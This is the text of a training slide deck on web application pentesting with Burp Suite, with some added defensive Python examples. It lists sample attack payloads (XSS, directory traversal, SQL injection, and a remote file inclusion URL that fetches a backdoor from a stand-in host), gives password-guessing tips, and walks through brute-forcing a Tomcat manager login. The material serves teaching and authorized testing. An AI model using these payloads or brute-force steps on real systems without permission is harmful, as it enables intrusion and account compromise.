
Web Hacking With Burp Suite 101


Page 1: Web Hacking With Burp Suite 101

Introduction to Web App Pentesting & Burp Suite 101


Build | Protect | Learn

Agenda


• $whoami
• Overview of Web App Testing & Vulnerabilities
• Burp Suite Overview
• Getting Started With Burp Suite
• Automated Testing
• Manual Testing
• Other Features in Burp
• Manual Testing Mindset & Example
• Additional Web Hack Tips N Tricks
• Useful Resources & Conclusion


~$ whoami


• InfoSec Geek
• Pentester @ BreakPoint Labs (0xcc_labs)
• Contributor to Primal Security Blog and Podcast
• @b3armunch (Personal Infosec Twitter)
• Certification Enthusiast (OSCP, GWAPT, GPEN, etc.)
• I Love Knowing What’s Going On (emerging vulns, tools, PoC), CTFs, Offensive Security Work, Football and Trying New Beers.


Full Disclosure!


• ALWAYS test what you’re about to learn in a lab environment or when you have permission!

• What I cover isn’t everything, but it’s enough to hopefully get you familiar and started with using Burp Suite


I Promise NOOOOO…


Overview


• Goal: To understand and learn about our “bread & butter” tool (Burp Suite) that we leverage on every web assessment.

• Motivation: Burp Suite could be one of your foundation tools that you leverage throughout your entire web assessment.

  - Burp provides manual and automated testing capabilities.
  - Burp has a free and a paid-for version (currently $349 per year).

• Quick Note: Static vs. Dynamic Web Content
  Static Content: Informational web content that tends to lack user features and capabilities.
  Dynamic Content: Content that allows for user input to be passed to the server.


Web App Testing Methodologies


• Having an established testing methodology is an important first step.

• Create checklists and templates to keep the assessment process consistent.

• Several great methodologies out there:
  - Penetration Testing Execution Standard (PTES)
  - OWASP Testing Guide (OTG) 4.0
  - Web Application Hacker’s Handbook Task Checklist

• Any great methodology will include both Automated and Manual testing.


Common Web Vulnerabilities


• Cross-Site Scripting (XSS): When an attacker can embed scripts in a page that execute client side (in the user’s web browser).

<script>alert("hello")</script>

• Directory Traversal: Used by an attacker to gain unauthorized access to restricted directories and resources on the web server.

index.php?q=../../../../../etc/password

• Cross-Site Request Forgery: An attack that forces an end user to execute unwanted actions on a web application to which the end user is currently authenticated.

http://testbank.com/transfer.php?acct=BadBob&amount=500

• Open Redirect Vulnerabilities: An application that takes a parameter and then redirects a user to the manipulated parameter value without any input validation.

index.php?redirect=https://badboysite.com
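From the defender’s side, an added example (not part of the slides) showing the server-side checks that close the directory traversal and open redirect cases above; the web root directory and the allowed host list are assumed values.

```python
from pathlib import Path
from typing import Optional
from urllib.parse import urlsplit

# Assumed values for this example: the directory pages are served from, and
# the hosts a redirect is allowed to land on.
WEB_ROOT = Path("/var/www/app/pages").resolve()
ALLOWED_HOSTS = {"example-site.com", "www.example-site.com"}


def safe_page_path(q: str) -> Optional[Path]:
    """Map ?q=<value> to a file under WEB_ROOT, or None if it escapes the root.

    resolve() collapses the ../ segments first, so the containment check sees
    where '../../../../../etc/password' really points instead of the raw string.
    """
    if "\x00" in q:                       # NUL truncates paths in some runtimes
        return None
    candidate = (WEB_ROOT / q.lstrip("/")).resolve()
    try:
        candidate.relative_to(WEB_ROOT)   # ValueError when outside WEB_ROOT
    except ValueError:
        return None
    return candidate


def safe_redirect_target(redirect: str) -> Optional[str]:
    """Accept ?redirect=<value> only when it keeps the user on this site.

    Site-relative paths ('/contact/contact-us.php') pass.  Absolute URLs must
    be http(s) to an allow-listed host; scheme-relative values ('//host/..'),
    backslash variants and non-http schemes ('javascript:') are refused because
    the browser would follow them off-site as readily as 'https://badboysite.com'.
    """
    target = redirect.strip()
    if "\\" in target:                    # browsers treat '\' like '/'
        return None
    parts = urlsplit(target)
    if not parts.scheme and not parts.netloc:
        # Relative: exactly one leading slash, so '//host' cannot slip through
        return target if target.startswith("/") and not target.startswith("//") else None
    if parts.scheme in ("http", "https") and parts.hostname in ALLOWED_HOSTS:
        return target
    return None


if __name__ == "__main__":
    for q in ("about/team.html", "../../../../../etc/password"):
        print(f"q={q!r:32} -> {safe_page_path(q)}")
    for r in ("/contact/contact-us.php", "https://badboysite.com", "//badboysite.com/x"):
        print(f"redirect={r!r:28} -> {safe_redirect_target(r)}")
```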


Common Web Vulnerabilities


• SQL Injection: A form of code injection used against data driven applications with malicious SQL statements being inserted into a data entry field or parameter value for execution.

username: admin'-- (Attempts to log you in as the admin user, with the rest of the SQL query being ignored.)

• Brute Force Attacks: A trial and error method used to obtain authentication to a web application. (username, password, pin, etc.)

• Remote File Inclusion (RFI): The ability to include links to remote files through the exploitation of vulnerable inclusion procedures implemented in the app.

http://vulnhost.com/index.php?file=http://badboysite.com/backdoor.php

• Local File Inclusion (LFI): The vulnerability occurs when a page include is not properly sanitized and an adversary can request a file located on the server through a web browser.


Web App Testing Procedure


1) Scoping: Get the lay of the land through a questionnaire or conference call. (Always document, though.)

2) Recon & Mapping: What are the size and technologies of the applications? (Spidering, Mapping and OSINT)

3) Automated Testing: Scan All The Things! (Utilizing automated scanners and open source testing tools too)

4) Manual Testing: Enumerate potential areas of interest and validate any automated tool findings (abuse features, test injection points and reduce false positives)

5) Reporting: Essentially putting all your hard work into one document.

6) Remediation & Review: Provide support and re-testing of findings once remediated


Burp Suite Overview


Often Burp will be leveraged for its interception proxy capabilities.

• Proxy: Intercept, Capture and Log Requests
• Spider: Discover Linked Content
• Scanner: Active Web App Vulnerability Scanner
• Intruder: Automate your testing through injection points
• Repeater: Take a request and manipulate it to analyze the response further
• Sequencer: Analyze Tokens (Are they randomly generated?)
• Encoder/Decoder: Encode or decode strings (URL, Base64, HTML)
• Comparer: Take two things and compare them side by side
• Extender: TONS of extensions to expand the features in Burp


• So Enough Talk….Let’s Actually Learn How to Use Burp!

Let’s Begin


Launching Burp

• Burp Suite is a Java jar file that can either be double clicked or run from the CLI. The following syntax can launch Burp:

java -Xmx1024m -jar burpsuite.jar


Burp’s Proxy

• Burp’s proxy is an intercepting proxy server that operates as a man-in-the-middle between your browser and the target web application.


Setting Up Your Browser


Burp’s Proxy Settings


Common Issue….


Define Your Scope


Map Your App (Click through)

• Understand the app’s purpose

• What Features are allowed?

• Can you sign in?

• View the Source

• Observe the file and directory structure

• What technologies are in use? (Wappalyzer)

• Is information being displayed that I can control?

• Does the app appear to interact with a database?


Spider (Linked Content)


Building Your Site Map

The Site Map Tree View contains a hierarchical representation of content, with URLs broken down into domains, directories, files, and parameterized requests.


Spider (Linked Content)


Filter Content In Your Site Map


Filtering Can Lead to…

• Client side comments (Easter eggs the developer left behind!)

• Email Addresses (Potentially leveraged for logins)

• Internal Path Disclosure

• Unlinked Files or Paths

• Potentially usernames and passwords (not very likely)

• Technology Enumeration


Analyze Your Target


Target Analyzer Summary

Static Content: Essentially content that could be considered “flat files”, meaning what you see is what you get! Often times static content is used to present end users news or information.

Dynamic Content: Allows for user interaction and communicates with “back end” or “server-side” requests from the application. Think of a search engine or login form.


HTTP History & Comments


Automated Testing



Automated Testing Will Miss Stuff

• The DHS National NCATS organization reported that 67% of high impact vulnerabilities required manual testing to enumerate.


Automated Testing Can Break Stuff


Automated Testing Can Take a Long Time


Automated Testing Can Have False Positives

• Burp: Right-Click -> [Send to Repeater] [Request in Browser]


Burp’s Automated Scan Wizard


Burp’s Automated Scan Queue


Burp’s Automated Scan Results


Generate a Burp Scan Report


Burp Automated Scan Report

• Burp Scanner Report will include: Finding Issue Details, Severity, Confidence, Request, Response, etc.



Manual Testing


Some Things To Think About

• What technology is in use?
• Ensure that you properly mapped the application
• Enumerate all technology features (File upload, Comments, etc.)
• Enumerate all areas of user input ("Injection Points")
• Can you figure out what is being done with your input?
• Is your input being presented on the screen? -> XSS
• Is your input calling on stored data? -> SQLi
• Does input generate an action to an external service? -> SSRF
• Does your input call on a local or remote file? -> File Inclusion
• Does your input end up on the file system? -> File Upload

• Think OWASP Top TEN….


OWASP Top Ten Snap Shot

Source: https://www.owasp.org/index.php/Top_10_2013-Top_10


Analyze Scan Results > Repeater (1)


Test, Modify & Repeat


Analyze Scan Results > Repeater (2)


Verify Results (XSS Example - False Positive)


Verify Results (XSS Example - Successful)


Think About How Input Is Being Used

Think about how you would attack the following parameters and their values:

http://example-site.com/index.php?redirect=/contact/contact-us.php

http://example-site.com/index.php?file=/app/load.php

http://example-site.com/index.php?name=zack

http://example-site.com/index.php?search=exploitdb

http://example-site.com/index.php?sql=SELECT * FROM USERS


Burp’s Intruder


Custom Fuzzing

• FuzzDB, RAFT lists, and SecLists provide great lists for custom fuzzing.
• As you start to understand how your input is being leveraged, you can start your fuzzing in an automated manner.
• Burp Suite Pro’s Intruder is my go-to tool for web application fuzzing.


Unlinked Content Treasures!

• Use Burp’s pre-built payload lists for fuzzing (Intruder, Pro version only)

• Use commonly known lists from tools like DirBuster or Wfuzz (we can enable Burp to add any new findings to our site map!)

• Use the “SecLists” collection and its lists, broken down as follows:
  - Passwords
  - Usernames
  - Discovery (collection of general and specific directories/resources)
  - Fuzzing (collection of various payloads sorted by attack type)
  - Miscellaneous (common ports, file extensions, list of US cities, etc.)
  - Pattern Matching (good for grepping through file contents)
  - IOCs (indicators of compromise: malicious domains, IPs, files, etc.)
  - New Feature: RobotsDisallowed (disallowed directories from the robots.txt files of the world’s top websites, specifically the Alexa 100K)

^ Source: https://github.com/danielmiessler/SecLists


Define Your Intruder Method

• Sniper – Sends a single set of payloads to the selected parameter value(s) to identify vulnerabilities.

• Battering Ram – Sends a single payload to all marked positions at once. It iterates through the payloads and places the same payload into all of the defined payload positions at once.

• Pitchfork – Sends a specific payload to each of the selected parameters in sequence. Each area of interest is passed its own designated values in a sequenced series of requests.

• Cluster Bomb – All payloads are tested against all the positions given, meaning that all permutations of payload combinations are tested. (WARNING: this is often the largest and longest attack method.)
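To make the four attack types concrete, here is an added model (my own, not Burp’s code) that fills § marked § positions the way each mode does and counts the resulting requests; the template reuses the URL from the “Think About How Input Is Being Used” slide and the payload sets are constructed placeholders.

```python
"""Model of Burp Intruder's four attack types (constructed example, not Burp code).

The template uses Burp's § markers around the original value of each payload
position; the payload sets passed in are constructed placeholder strings.
"""
import itertools
import re

MARKER = re.compile(r"§([^§]*)§")


def positions(template):
    """Return the original value of each § marked § position, in order."""
    return MARKER.findall(template)


def fill(template, values):
    """Substitute one value per position (values are consumed left to right)."""
    it = iter(values)
    return MARKER.sub(lambda m: next(it), template)


def intruder_requests(mode, template, payload_sets):
    """Yield the requests Intruder would send for the given attack type.

    sniper / battering ram use payload_sets[0] only; pitchfork / cluster bomb
    need one set per position.
    """
    originals = positions(template)
    n = len(originals)
    if mode == "sniper":
        # One position at a time; the others keep their original value.
        for i in range(n):
            for p in payload_sets[0]:
                vals = list(originals)
                vals[i] = p
                yield fill(template, vals)
    elif mode == "battering ram":
        # The same payload dropped into every position simultaneously.
        for p in payload_sets[0]:
            yield fill(template, [p] * n)
    elif mode == "pitchfork":
        # Position i walks payload_sets[i] in step; stops at the shortest set.
        for combo in zip(*payload_sets[:n]):
            yield fill(template, combo)
    elif mode == "cluster bomb":
        # Every combination across sets: the product of the set sizes.
        for combo in itertools.product(*payload_sets[:n]):
            yield fill(template, combo)
    else:
        raise ValueError(f"unknown attack type: {mode}")


def request_count(mode, template, payload_sets):
    """Number of requests each mode generates (why Cluster Bomb is the longest)."""
    return sum(1 for _ in intruder_requests(mode, template, payload_sets))


if __name__ == "__main__":
    # Two positions marked in the deck's example URL; constructed payload sets.
    tmpl = "GET /index.php?name=§zack§&search=§exploitdb§ HTTP/1.1"
    sets = [["A", "B"], ["1", "2", "3"]]
    for mode in ("sniper", "battering ram", "pitchfork", "cluster bomb"):
        print(f"{mode:14s} {request_count(mode, tmpl, sets):2d} requests")
        for r in intruder_requests(mode, tmpl, sets):
            print("   ", r)
```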


Burp’s Intruder: Set Your Position


Define the Intruder Payload List


Intruder’s Results (Status | Length)

Note: You may want to uncheck payload encoding if not needed!


Burp Pro’s Discover Content (Unlinked)


Burp’s Discover Content Options


Burp’s Discover Content Session Status


Other Features in Burp…


Burp’s Encoder/Decoder


Burp’s Comparer

Key: Modified | Deleted | Added


Burp’s Sequencer


Burp’s Extender


Manual Testing Mindset & Example

• Now let’s cover a basic example of how we can compromise a web application through several features that we can abuse!


Weak Authentication Mechanism

• Very common finding with web application penetration testing
• Often combines several vulnerabilities:
  - Username enumeration (Low) +
  - Lack of Automation Controls (Low) +
  - Lack of Password Complexity Requirements (Low) =
  - Account Compromise (Critical)


Weak Authentication: Username Enumeration

• Password Reset Features: “Email address not found”
• Login Error Messages: “Invalid Username”
• Timing for login attempts: Valid = 0.4 secs, Invalid = 15 secs
• User Registration: “Username already exists”
• Various error messages, and HTML source
• Contact Us Features: “Which Admin do you want to contact?”
• Google Hacking and OSINT
• Document Metadata
• Sometimes the application tells you!


Weak Authentication: Automation Controls

• Pull the authentication request up in Burp’s Repeater and try it a few times.

• If you see no sign of automation controls, send to Burp’s Intruder for more aggressive testing.
  - No account lockout
  - No/weak CAPTCHA
  - Main login is strong, but other resources are not (Mobile Interface, API, etc.)


Weak Authentication: Weak Passwords

• We as humans are bad at passwords…here are some tricks that work for me:
  - Password the same as username
  - Variations of “password”: “p@ssw0rd”…
  - Month+Year, Season+Year: summer2016…
  - Company Name + year
  - Keyboard Walks (PW Generator): “!QAZ2wsx”
  - My Favorites…Burp Pro’s built-in wordlist or SecLists password files

• Lots of wordlists out there; consider making a targeted wordlist using CeWL (scrape sites for unique keywords).

• Research the targeted user’s interests and build lists around those interests.


Piecing Together What We Know…

• We have enumerated that there’s a valid account named “tomcat” from the password reset functionality in the forms-based login (also a default account for Apache Tomcat).

• The application also has basic authentication protecting its “tomcat manager” login on port 8080 (no lockout built in, and we will need to Base64-encode payloads).

• We know there’s a lack of password complexity, since we made a test account with a password of “password” (create-account feature abuse).

• Let’s leverage Burp’s Intruder to brute force…


Manipulating Our Target Request

1. View our HTTP History under the Proxy tab.
2. Find our HTTP request for the Tomcat ‘/manager/html’ login resource.
3. Send our request to Burp’s Intruder.


Burp Intruder Payload Configuration

4. Add the § payload markers § around the Basic Authorization value, using the Sniper attack type.


Analyze Your Encoded Payload

To provide further context, let’s decode our sample login attempt to the Tomcat login: Send to Burp’s Decoder > Base64 Decode, and we can see our attempt in plaintext.

(i.e.) tomcat:password


Burp Intruder Payload Set Up

5. Custom Iterator and Position 1 Set
6. Set Position 1 Separator “:”
7. Set Position 2 Password List


Payload Processing Base64 Encode

8. Add a Payload Processing Rule > Encode > Base-64 Encode your payload > Properly submits our brute force attempts!!!


Start Intruder & Review Results

9. Look for a variance in your HTTP status or length of response across your payload attempts.
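From the defender’s side, an added example (not part of the talk) that does the Decoder step from the walkthrough in code and then scans a constructed request log for the brute force just described: many distinct passwords for one user from one source, every attempt answered 401, then the status change that marks a hit. The log format and the 10.0.0.x sources are constructed; the passwords are the ones listed on the weak-password slide.

```python
import base64
import binascii
from collections import defaultdict
from typing import Optional, Tuple

MANAGER_PATH = "/manager/html"   # the Basic-auth protected resource in the walkthrough


def decode_basic(header_value: str) -> Optional[Tuple[str, str]]:
    """'Basic dG9tY2F0OnBhc3N3b3Jk' -> ('tomcat', 'password'); None if malformed.

    The same Base64 decode the walkthrough does by hand in Burp's Decoder.
    """
    scheme, _, token = header_value.strip().partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, password = raw.partition(":")
    return (user, password) if sep else None


# Constructed request log, one attempt per line:
#   <epoch> <src_ip> <path> <auth scheme> <auth token> <status>
# Five guesses from one source within two seconds, all 401 until the last one.
SAMPLE_LOG = """\
1470000000 10.0.0.5 /manager/html Basic dG9tY2F0OnRvbWNhdA== 401
1470000001 10.0.0.5 /manager/html Basic dG9tY2F0OmFkbWlu 401
1470000001 10.0.0.5 /manager/html Basic dG9tY2F0OnN1bW1lcjIwMTY= 401
1470000002 10.0.0.5 /manager/html Basic dG9tY2F0OnBAc3N3MHJk 401
1470000002 10.0.0.5 /manager/html Basic dG9tY2F0OnBhc3N3b3Jk 200
1470000500 10.0.0.9 /manager/html Basic dG9tY2F0OnBhc3N3b3Jk 200
"""


def find_brute_force(log_text: str, threshold: int = 3, window: int = 60) -> list:
    """Flag (src, user) pairs that tried >= threshold distinct passwords within
    `window` seconds.  A working lockout or rate limit would stop the run of
    401s, so the pattern itself is the 'lack of automation controls' finding;
    a 200 at the end of the run is the status variance that marks a hit.
    """
    attempts = defaultdict(list)             # (src, user) -> [(ts, password, status)]
    for line in log_text.splitlines():
        ts, src, path, scheme, token, status = line.split()
        if path != MANAGER_PATH:
            continue
        creds = decode_basic(f"{scheme} {token}")
        if creds:
            attempts[(src, creds[0])].append((int(ts), creds[1], int(status)))
    alerts = []
    for (src, user), events in attempts.items():
        events.sort()
        span = events[-1][0] - events[0][0]      # whole-run span; production code
        passwords = {pw for _, pw, _ in events}   # would use a sliding window
        if len(passwords) >= threshold and span <= window:
            alerts.append({
                "src": src, "user": user, "attempts": len(events),
                "distinct_passwords": len(passwords),
                "succeeded": any(st == 200 for _, _, st in events),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_brute_force(SAMPLE_LOG):
        print(alert)
```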


ACHIEVEMENT UNLOCKED!!!!


Additional Web Hack Tips N Tricks


Reconnaissance: Identify New Systems and Content

• Companies are normally quite surprised about what is exposed to the Internet.

• How do you tackle large /8’s and /16’s? How do you even build out this footprint starting with a company name?
  - Shodan + Censys.io (3rd-party DBs with port/service info)
  - Domain + IP Research (host, dig, whois, etc.)
  - Masscan + Nmap (identify open ports and services)
  - WhatWeb + Wappalyzer (ID tech stack)
  - Google, Bing, etc. (search syntax)
  - OSINT: Company mergers + acquisitions (expand scope?)


Big Scope? Quick Visual: EyeWitness

• EyeWitness is a tool that takes in URLs and creates a report with server headers + a screenshot of the web GUI

• Extremely useful when facing a large scope


Don’t Judge a System By Its IP

• Requesting an application URL by IP might give back different content vs. the domain.

• Load Balancing could exist to where an application could be mirrored across several IP addresses (Commonly seen with large sites i.e. banks).

• Keep in mind you can have several applications living on the same IP (Virtual Hosting).

• Pointing an automated tool to “http://ip/” may miss a lot of stuff vs. “http://ip/AppIsHere/”.


Shot in The Dark “Nikto” Scan

• Open source web application vulnerability scanner that checks for low-hanging-fruit vulnerabilities and some old goodies. (False positives will happen!)


Version Specific Vulnerabilities

• Enumerating the technology and version in use goes a long way toward finding vulnerabilities (Google + Exploit-DB)

• What do I know about the technology and how can I find more information?


Build Your Own Custom Report

• We leverage Markdown for custom reporting to produce our reports in HTML format. Common Findings Database - check it out


Useful Resources

• CTFs: Vulnhub, Past CTF Writeups, Pentester Lab
• Training: GWAPT, Offensive Security
• Book: Web Application Hacker’s Handbook
• Talk: How to Shot Web - Jason Haddix
• Talk: How to be an InfoSec Geek - Primal Security
• Talk: File in the hole! - Soroush Dalili
• Talk: Polyglot Payloads in Practice - Marcus Niemietz
• Talk: Running Away From Security - Micah Hoffman
• Github Resource: Security Lists For Fun & Profit

• BPL Blog Post on this Talk:


Conclusion

Email: [email protected]

• Burp Suite is a great baseline tool to leverage in all your future web assessments.

• OWASP has an abundance of information to reference and learn from.

• Read blogs and Twitter whenever possible; often dozens of web vulnerabilities and potential exploits are released every day.